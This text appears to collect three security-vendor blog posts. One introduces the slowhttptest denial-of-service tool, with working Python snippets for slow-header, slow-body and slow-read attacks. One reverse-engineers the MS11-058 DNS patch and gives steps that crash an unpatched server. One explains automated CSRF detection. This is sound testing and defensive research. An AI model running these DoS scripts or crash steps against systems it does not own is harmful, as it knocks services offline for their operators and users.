
Slow HTTP attacks are denial-of-service (DoS) attacks that rely on the fact that the HTTP protocol, by design, requires a request to be completely received by the server before it is processed. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a denial of service. These attacks are problematic because they are easy to execute: they require only minimal resources on the attacking machine.
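
To make the mechanics concrete, here is a minimal Python sketch (not part of the tool) that holds a single connection open Slowloris-style; the host name is a placeholder, and a real test would open hundreds of such sockets in parallel:

import socket
import time

TARGET = "victim.example.com"  # placeholder; only test servers you own

# Send a deliberately incomplete request: the blank line that terminates
# the header section is never sent.
s = socket.create_connection((TARGET, 80))
s.send(b"GET / HTTP/1.1\r\n")
s.send(b"Host: " + TARGET.encode() + b"\r\n")

# Trickle one bogus header every 10 seconds so the server keeps the
# connection, and the resources backing it, tied up.
for i in range(100):
    s.send(b"X-a%d: b\r\n" % i)
    time.sleep(10)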

 

Inspired by Robert “RSnake” Hansen’s Slowloris and Tom Brennan’s OWASP slow post tools, I started developing another open-source tool, called slowhttptest, available with full documentation at http://code.google.com/p/slowhttptest. Slowhttptest opens and maintains customizable slow connections to a target server, giving you a picture of the server’s limitations and weaknesses. It includes features of both of the above tools, plus some additional configurable parameters and nicely formatted output.

 

Slowhttptest is configurable to allow users to test different types of slow HTTP scenarios. Supported features are:

  • slowing down either the header or the body section of the request
  • any HTTP verb can be used in the request
  • configurable Content-Length header
  • random size of follow-up chunks, limited by optional value
  • random header names and values
  • random message body data
  • configurable interval between follow-up data chunks
  • support for SSL
  • support for host names that resolve to IPv6 addresses
  • verbosity levels in reporting
  • connection state change tracking
  • variable connection rate
  • detailed statistics available in CSV format and as an HTML chart generated using Google Chart Tools

 

How to Use

The tool works out of the box with default parameters, which are harmless and most likely will not cause a denial of service.

 

Type:

 

$ PREFIX/bin/slowhttptest

 

and the test begins with the default parameters.
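
For more control, the default parameters can be overridden on the command line. As an example based on the project documentation (options can change between versions, so consult slowhttptest -h for yours), a slow-headers test that also generates CSV and HTML statistics might look like:

$ PREFIX/bin/slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://victim.example.com/ -x 24 -p 3

Here -c sets the number of connections, -H selects the slow headers test, -g and -o generate statistics under the given file prefix, -i is the interval between follow-up data in seconds, -r is the connection rate per second, -x caps the size of follow-up chunks, and -p is the timeout used to probe whether the server still responds.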

 

Depending on which test mode you choose, the tool will send either slow headers:

 

GET / HTTP/1.1CRLF
Host: localhost:80CRLF
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2)CRLF
.
. n seconds
.
X-HMzV2bwpzQw9jU9fGjIJyZRknd7Sa54J: u6RrIoLRrte4QV92yojeewiuDa9BL2N7CRLF
.
. n seconds
.
X-nq0HRGnv1W: T5dSLCRLF
.
. n seconds
.
X-iFrjuN: PdR7Jcj27PCRLF
.
.
.

 

or slow message bodies:

 

POST / HTTP/1.1CRLF
Host: 10.10.25.116:443CRLF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) Gecko/20100101
Firefox/5.0.1CRLF
Content-Length: 8192CRLF
Connection: closeCRLF
Referer: http://code.google.com/p/slowhttptest/CRLF
Content-Type: application/x-www-form-urlencodedCRLF
Accept: text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5CRLF
CRLF
foo=bar
.
. n seconds
.
&rjP8=du7FKMe
.
. n seconds
.
&93zgIx=jgfpopJ
.
.
.

 

The process repeats until the server closes the connection or the test reaches the specified time limit.
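
The slow body variant can be sketched the same way as the earlier Python snippet: the header section is complete, but the request promises far more body (via Content-Length) than it delivers (host name again a placeholder):

import socket
import time

TARGET = "victim.example.com"  # placeholder lab host

s = socket.create_connection((TARGET, 80))
# Complete headers promising an 8192-byte body.
s.send(b"POST / HTTP/1.1\r\n"
       b"Host: " + TARGET.encode() + b"\r\n"
       b"Content-Type: application/x-www-form-urlencoded\r\n"
       b"Content-Length: 8192\r\n"
       b"\r\n")
s.send(b"foo=bar")

# Drip a few bytes of the promised body at a time; the server keeps
# waiting for the remainder.
for _ in range(2000):
    s.send(b"&a=b")
    time.sleep(10)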

 

Depending on the verbosity level selected, the slowhttptest tool logs anything from heartbeat messages every 5 seconds to a full traffic dump. Output is available either in CSV format or in HTML for interactive use with Google Chart Tools.

 

Note: Care should be taken when using this tool to avoid inadvertently causing denial of service against your servers. For production servers, QualysGuard Web Application Scanner will perform passive (non-intrusive) automated tests that will indicate susceptibility to slow http attacks without the risk of causing denial of service.

 

Example Test and Results

The HTML screenshot below shows the results of running slowhttptest against a test server in a test lab. In this scenario, the tool opened 1000 connections at a rate of 200 connections per second, and the server was able to concurrently process only 377 connections, leaving the remaining 617 connections pending. Denial of service was achieved within the first 5 seconds of the test and lasted 60 seconds, until the server timed out some of the active connections. At that point, the server moved another set of connections from the pending state to the active state, causing DoS again until the server timed out those connections as well.

 


Figure 1: Sample HTML output of slowhttptest results.

 

As is shown in the above test, the slowhttptest tool can be used to test a variety of slow HTTP attacks and to understand the effects they will have on specific server configurations. By having a visual representation of the server’s state, it is easy to understand how the server reacts to slow HTTP requests. It is then possible to adjust server configurations as appropriate. In follow-up posts, I will present detailed analysis of how different HTTP servers behave under slow attacks, along with mitigation techniques.

 

Any comments are highly appreciated, and I will review all feature requests posted on the project page at http://code.google.com/p/slowhttptest. Many thanks to those who are contributing to this project.

 

 

 

Update, August 26, 2011:

Version 1.1 of slowhttptest includes a new test for the Apache range header handling vulnerability, also known as the "Apache Killer" attack. A usage example can be found at http://code.google.com/p/slowhttptest/wiki/ApacheRangeTest.

 

Update, January 5, 2012:

Version 1.3 of slowhttptest includes a new test for the Slow Read DoS attack.
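
Slow Read reverses the direction of the attack: the request is sent in full, but the client drains the response a few bytes at a time through a small TCP receive window. A rough Python illustration of the idea (placeholder host; the tool itself does this across many concurrent connections):

import socket
import time

TARGET = "victim.example.com"  # placeholder; only test servers you own

s = socket.socket()
# Shrink the receive buffer before connecting so a tiny TCP window is advertised.
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 256)
s.connect((TARGET, 80))
s.send(b"GET / HTTP/1.1\r\nHost: " + TARGET.encode() + b"\r\n\r\n")

# Read the response very slowly, keeping the server's send buffer full.
while s.recv(8):
    time.sleep(5)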

Posted by Bharat Jogi on Aug 23, 2011 in Security Labs

Patch Analysis for MS11-058

In the Patch Tuesday for August 2011, Microsoft released Security Bulletin MS11-058 (CVE-2011-1966) to fix an unauthenticated remote code execution vulnerability in DNS servers. According to the security advisory, a remote code execution vulnerability exists because the Windows DNS Server improperly handles a specially crafted NAPTR query string in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the system.

 

We reverse engineered the patch to get a better understanding of the mechanism of the vulnerability and found this vulnerability can be triggered with a few easy steps. While the proof of concept described below demonstrates a denial of service, attackers with malicious intent may be able to get reliable code execution.

 

QualysGuard detects this vulnerability with QID: 90726 - Microsoft Windows DNS Server Remote Code Execution Vulnerability (MS11-058). Because of the possibility of a code execution attack, Qualys recommends that all customers scan their environments for QID 90726 and apply this security update as soon as possible.

 

Sample

Unpatched File: dns.exe (version: 6.0.6002.18005)
Patched File: dns.exe (version: 6.0.6002.18486)

 

Patch Analysis

  1. We start the analysis by binary-diffing the unpatched and patched versions of the files made available by the MS11-058 security update. This helps us understand the changes the patch made to fix the vulnerabilities. To perform the binary diffing we use TurboDiff, a plugin for IDA Pro. TurboDiff shows a list of all the functions that are identical, changed, unmatched, or suspicious. Suspicious functions have unchanged function graphs but changed checksums, which indicates a small code change. While most of the functions look identical, TurboDiff lists some of them as suspicious (Fig. 1).


    Figure 1: Diffing results by TurboDiff.

  2. As seen in Figure 1, TurboDiff lists four functions as suspicious. The vulnerability we are investigating, CVE-2011-1966, is related to the Name Authority Pointer (NAPTR) DNS resource record. From the names of the four suspicious functions, it is pretty clear that ‘NaptrWireRead(x,x,x,x)’ has something to do with the NAPTR DNS record, and it should be the first function to analyze further.

  3. A closer look at the diffing results for the function NaptrWireRead(x,x,x,x) reveals that only one change was made to the entire function (Figure 2, indicated with a green box).

  4. The sign-extended move instruction “movsx edi, byte ptr[ebx]” is replaced with the zero-extended move instruction “movzx edi, byte ptr[ebx]”. This value is then used as the number of bytes to copy from the source buffer to the destination buffer with memcpy().

  5. The sign-extended move instruction is the troublemaker here. If the byte pointed to by “byte ptr[ebx]” is greater than 127 (0x7F), the resulting value in the edi register will be a very large number. For example, if the byte at [ebx] is 128, the resulting value in register edi will be 0xFFFFFF80. The next instruction “LEA EAX, DWORD PTR DS:[EDI+1]” then loads EAX with 0xFFFFFF81, which is used as the count for memcpy(). The copy attempts to read nearly 4 GB of memory, crashing the DNS service. (The short sketch after Figure 2 reproduces this arithmetic.)


    Figure 2: Binary Diff for function NaptrWireRead(x,x,x,x).
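
To double-check the arithmetic in step 5, here is a small Python sketch (illustrative only) that mirrors the 32-bit behavior of the two instructions:

def movsx_byte(b):
    # Sign-extend a byte to 32 bits, as "movsx edi, byte ptr [ebx]" does (unpatched).
    return (b | ~0xFF) & 0xFFFFFFFF if b & 0x80 else b

def movzx_byte(b):
    # Zero-extend a byte to 32 bits, as "movzx edi, byte ptr [ebx]" does (patched).
    return b & 0xFF

length_byte = 128  # first length byte of an over-long NAPTR field
print(hex((movsx_byte(length_byte) + 1) & 0xFFFFFFFF))  # 0xffffff81: a huge memcpy() count
print(hex((movzx_byte(length_byte) + 1) & 0xFFFFFFFF))  # 0x81: the intended count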

DoS Proof-of-Concept

  1. For the proof of concept, you need two DNS servers. Register the domain crasher.test.com on the first server and configure a NAPTR DNS record as shown in Figure 3 below. The second DNS server acts as a forwarder. Of all the fields shown, the “Service String” and “Regular Expression” fields are the ones that can take input longer than 127 characters with no restrictions.

  2. To exploit this vulnerability, give either of these fields a value longer than 127 characters. In this case we set the “Regular Expression” field to 128 characters.

  3. From the forwarder DNS, type the command “nslookup -type=all crasher.test.com. 127.0.0.1”. This command will crash the DNS server working as the forwarder.


    Figure 3: DNS NAPTR form.

  4. To see the vulnerability in action, attach your debugger to the DNS executable and set breakpoints at the NaptrWireRead(x,x,x,x) function and at the memcpy() call inside it.


    Figure 4: BreakPoint at memcpy() in NaptrWireRead().

  5. From Figure 4 (see the values passed on the stack when calling memcpy()), it is clear that the over-long field value caused the count parameter of memcpy() to be a very large number, causing an access violation and crashing the DNS server.

  6. The call stack trace for the crash can be seen in Figure 5 below.


    Figure 5: Call Stack Trace.

  7. To analyze the crash with WinDbg, start it with the command “windbg -I” to register it as the default postmortem debugger. When you run “nslookup -type=all crasher.test.com. 127.0.0.1” again, the DNS server crashes and WinDbg starts for analysis. Figure 6 shows the output of the !exploitable crash analyzer.


    Figure 6: !exploitable plugin output.

Conclusion

As shown in the analysis above, this vulnerability can be triggered with a few easy steps. While this PoC demonstrates a denial of service, attackers with malicious intent may be able to achieve reliable code execution. Hence we recommend that all customers scan their environments for QID 90726 and apply this security update as soon as possible.


Interest in the QualysGuard Web Application Scanning (WAS) module has been growing since its new UI was demonstrated last week at BlackHat. Along with such interest come questions about how the scanner works. The ultimate goal for WAS is to provide accurate, scalable testing for the most common, highest profile vulnerabilities (think of SQL injection and XSS) so that manual testing can skip the tedious and time-consuming aspects of an app review and focus on complex vulns that require brains rather than RAM.

 

One complex vuln in particular is CSRF. Automated, universal CSRF detection is a tough challenge, which is why we try to solve the problem in pieces rather than all at once. It's the type of challenge that keeps web scanning interesting. Here’s a brief look at the approach we've taken to start bringing CSRF detection into the realm of automation.

 

First, the test assumes an authenticated scan. If the scan is not given credentials, then the tests won't be performed. Also, tests are targeted to specific manifestations of CSRF rather than the broad set of attacks possible from our friendly sleeping giant.

 

Tests roughly follow these steps; a short code sketch after the list illustrates the core idea. Fundamentally, we're trying to model an attack rather than make inferences based on pattern matching:

 

1. Identify forms with a "session context". This is a weaker version of (but hopefully a subset of) a "security context", because security often requires knowledge of the boundaries within an app and the authorized actions of a user. That knowledge is hard to come by automatically. Nevertheless, some utility can be had by looking at forms with the following attributes:

  • Only available to an authenticated user.
  • Are not "trivial" such as search forms or logout buttons.
  • Have an observable effect, either on the session or the HTTP response. (Hint: Here's where the automated scan becomes narrow, meaning prone to false negatives.)

 

2. Set up two separate sessions for the user (i.e. login twice). Keep their cookie jars apart. We’ll refer to the sessions as Aardvark and Bobcat (or A & B or Alpha & Bravo, etc.). Remember, this is for a single user.

 

3. Obtain a form for session Aardvark.

 

4. Obtain a form for session Bobcat.

 

5. Swap the forms between the two sessions and submit. (Crossing the streams, like Egon told you not to do.)

  • The assumption is that any CSRF tokens in Aardvark’s form are tied to the session cookie(s) used by Aardvark and Bobcat’s belong to Bobcat. Things should blow up if the tokens and session don't match.

 

6. Examine the "swapped" responses.

  • If the form’s fields never change between sessions, then this is a good indicator that no CSRF token is present. You have to run tests with a browser in order to make sure there’s no JavaScript dynamically changing the form when the page loads or the form is submitted.
  • If the response has a clear indication of error, then the app is more likely to be protected from CSRF. The obvious error is something like, "Invalid CSRF token". Sadly, the world is not unicorns and rainbows for automated scanning and errors may not be so obvious or point so directly to CSRF.
  • If the response is similar to the one received from the original request, then it appears that the form is not coupled to a user's session. This is an indicator that the form is more probably vulnerable to CSRF.
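
The core of the swap test can be sketched in a few lines of Python. Everything here is an assumption for illustration: the application URLs, the login form fields, the error string, and the crude regex-based form parser all stand in for the scanner's real HTML and browser handling:

import re
import requests

BASE = "https://app.example.com"  # hypothetical application under test

def parse_form(html):
    # Crude extraction of <input name="..." value="..."> pairs; the real
    # scanner parses full HTML and runs JavaScript in a browser.
    return dict(re.findall(r'<input[^>]*name="([^"]+)"[^>]*value="([^"]*)"', html))

def login():
    # Each call yields an independent session with its own cookie jar.
    s = requests.Session()
    s.post(BASE + "/login", data={"user": "alice", "pass": "secret"})
    return s

aardvark, bobcat = login(), login()  # two sessions, same user

form_a = parse_form(aardvark.get(BASE + "/profile").text)
form_b = parse_form(bobcat.get(BASE + "/profile").text)

if form_a == form_b:
    print("Form fields identical across sessions: likely no per-session token")

# Cross the streams: submit Bobcat's form fields under Aardvark's cookies.
resp = aardvark.post(BASE + "/profile", data=form_b)
if "invalid csrf token" in resp.text.lower():  # assumed error string
    print("Tokens appear to be validated against the session")
else:
    print("Swapped form accepted: the form may not be coupled to the session")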

 

What it won't do, because these techniques are noisy and unreliable (as opposed to subtle and quick to anger):

  • Look for hidden form fields with names or values that match CSRF tokens. If an obvious token is present, that doesn't mean the app is actually validating it.
  • Use static inspection of the form, DOM, or HTML to look for any examples of CSRF tokens. Why look for text patterns when you're trying to determine a behavior? Not everything is solved by regexes. (Which really is unfortunate, by the way.)
  • Attempt to evaluate the predictability of anything that looks like a CSRF token.
  • Submit forms without loading the complete page and its resources in a browser; otherwise JavaScript-based countermeasures would not be noticed.

 

Nor will it demonstrate the compounding factor of CSRF on other vulnerabilities like XSS. That's something that manual pen-testing should do. In other words, WAS is focused on identifying vulns (it should find an XSS vuln, but it won't tie the vuln to a CSRF attack to demonstrate a threat). Manual pen-testing more often focuses on how deep an app can be compromised -- and the real risks associated with it.

 

What it'll miss:

  • Situations where session cookie(s) are static or relatively static for a user. This impairs the "swap" test.
  • CSRF that can affect unauthenticated users in a meaningful way. This is vague, but as you read more about CSRF you’ll find that some people consider any forgeable action a vuln. This speaks more to the issue of evaluating risk. You should rely on people, not tools, to analyze risk.
  • CSRF that affects the user's privacy. This requires knowledge of the app's policy and the impact of the attack.
  • Forms whose effect on a user's security context manifests in a different response, or in a manner that isn't immediately evident.
  • CSRF tokens in the header, which might lead to false positives.
  • CSRF vulns that manifest via links rather than forms. Apps put all kinds of functionality in hrefs rather than explicit form tags.
  • Other situations where we play games of anecdotes and what-ifs.

 

What we are trying to do:

  • Reduce noise. Don't report vulns for the sake of reporting a vuln if no clear security context or actionable data can be provided.
  • Provide a discussion point so we can explain the benefits of automated web scanning and point out where manual follow-up will always be necessary.
  • Learn how real-world web sites implement CSRF in order to find common behaviors that might be detectable via automation. You'd be surprised (maybe) at how often apps have security countermeasures that look nothing like OWASP recommendations and, consequently, fare rather poorly.
  • Experiment with pushing the bounds of what automation can do, while avoiding hyperbolic claims that automation solves everything.

 

The current state of CSRF testing in WAS should be relied on as a positive indicator (vuln found, vuln exists) more so than a negative indicator (no vuln found, no vulns exist). That's supposed to mean that a CSRF vuln reported by WAS should not be a false positive and should be something that the app's devs need to fix. It also means that if WAS doesn't find a vuln, the app may still have CSRF vulns. For this particular test a clean report doesn't mean a clean app; there are simply too many ways of looking at the CSRF problem to tackle it all at once. We're trying to break the problem down into manageable parts in order to understand what approaches work. We want to hear your thoughts and feedback on this.
